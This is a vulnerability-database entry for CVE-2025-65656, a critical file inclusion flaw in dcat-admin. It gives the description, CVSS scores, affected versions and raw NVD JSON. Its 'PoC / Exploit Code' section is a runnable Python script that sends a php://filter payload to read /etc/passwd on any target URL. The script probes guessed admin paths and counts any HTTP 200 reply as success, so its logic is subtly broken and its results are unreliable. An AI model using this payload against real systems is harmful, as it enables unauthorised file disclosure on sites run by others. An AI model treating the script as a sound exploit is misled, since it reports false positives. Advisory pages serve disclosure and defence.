Security Vulnerability Report
中文
CVE-2025-65656 CVSS 9.8 CRITICAL

CVE-2025-65656

Published: 2025-12-02 17:16:07
Last Modified: 2025-12-03 18:19:44

Description

dcat-admin v2.2.3-beta and before is vulnerable to file inclusion in admin/src/Extend/VersionManager.php.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:dcatadmin:dcat_admin:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:dcatadmin:dcat_admin:*:beta:*:*:*:*:*:* - VULNERABLE
dcat-admin < 2.2.3-beta
dcat-admin v2.2.3-beta and before

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-65656 File Inclusion PoC for dcat-admin # Target: dcat-admin v2.2.3-beta and before # Location: admin/src/Extend/VersionManager.php def check_vulnerability(target_url): """ Check if the target is vulnerable to CVE-2025-65656 """ # Common paths for dcat-admin VersionManager paths = [ '/admin/extend/version', '/admin/VersionManager', '/VersionManager', '/admin.php/extend/version', ] # LFI payload using php://filter lfi_payload = '?version=php://filter/read=convert.base64-encode/resource=/etc/passwd' print(f'[*] Testing target: {target_url}') print(f'[*] CVE-2025-65656 File Inclusion PoC') for path in paths: url = target_url.rstrip('/') + path + lfi_payload try: response = requests.get(url, timeout=10, verify=False) if 'root:' in response.text or response.status_code == 200: print(f'[+] Potentially vulnerable path found: {path}') print(f'[+] Payload: {lfi_payload}') return True except requests.RequestException as e: print(f'[-] Error testing {path}: {e}') print('[-] No vulnerable endpoints found') return False if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2025-65656.py <target_url>') print('Example: python cve-2025-65656.py http://vulnerable-site.com') sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65656", "sourceIdentifier": "[email protected]", "published": "2025-12-02T17:16:06.697", "lastModified": "2025-12-03T18:19:43.993", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "dcat-admin v2.2.3-beta and before is vulnerable to file inclusion in admin/src/Extend/VersionManager.php."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dcatadmin:dcat_admin:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.7.9", "matchCriteriaId": "7F4217AF-E0B6-4A5C-8BAF-F86C9B11F558"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dcatadmin:dcat_admin:*:beta:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndIncluding": "2.2.3", "matchCriteriaId": "0F0A25D9-3C42-4D69-B94B-2607CF100F38"}]}]}], "references": [{"url": "https://github.com/jqhph/dcat-admin", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/lznlol/operation-log/blob/main/CVE-2025-65656.md", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}]}}